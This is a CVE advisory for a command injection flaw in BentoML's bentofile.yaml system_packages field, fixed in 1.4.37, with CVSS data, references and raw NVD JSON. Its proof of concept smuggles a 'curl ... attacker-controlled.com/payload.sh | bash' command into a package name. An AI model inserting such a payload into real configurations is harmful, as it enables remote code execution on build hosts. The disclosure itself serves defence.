CVE-2026-33744

Description

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:bentoml:bentoml:*:*:*:*:*:*:*:* - VULNERABLE

BentoML < 1.4.37

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# bentofile.yaml malicious configuration example
service: "service.py:svc"
labels:
  owner: victim
  project: demo
include:
  - "*.py"
docker:
  dockerfile_template: "./Dockerfile"
  # Exploit: Injecting arbitrary command via package name
  system_packages:
    - "vim"
    - "curl http://attacker-controlled.com/payload.sh | bash #"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33744
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33744
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33744/
[4] VulDB https://vuldb.com/cve/CVE-2026-33744
[5] https://github.com/bentoml/BentoML/security/advisories/GHSA-jfjg-vc52-wqvf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33744", "sourceIdentifier": "[email protected]", "published": "2026-03-27T01:16:21.007", "lastModified": "2026-04-01T15:00:48.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue."}, {"lang": "es", "value": "BentoML es una biblioteca de Python para construir sistemas de servicio en línea optimizados para aplicaciones de IA e inferencia de modelos. Antes de la versión 1.4.37, el campo 'docker.system_packages' en 'bentofile.yaml' aceptaba cadenas arbitrarias que se interpolaban directamente en los comandos 'RUN' de Dockerfile sin sanitización. Dado que 'system_packages' es semánticamente una lista de nombres de paquetes del sistema operativo (datos), los usuarios no esperan que los valores se interpreten como comandos de shell. Un 'bentofile.yaml' malicioso logra la ejecución arbitraria de comandos durante 'bentoml containerize' / 'docker build'. La versión 1.4.37 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bentoml:bentoml:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.37", "matchCriteriaId": "C913A594-9EEC-40AC-A218-6FEA1F57E614"}]}]}], "references": [{"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-jfjg-vc52-wqvf", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}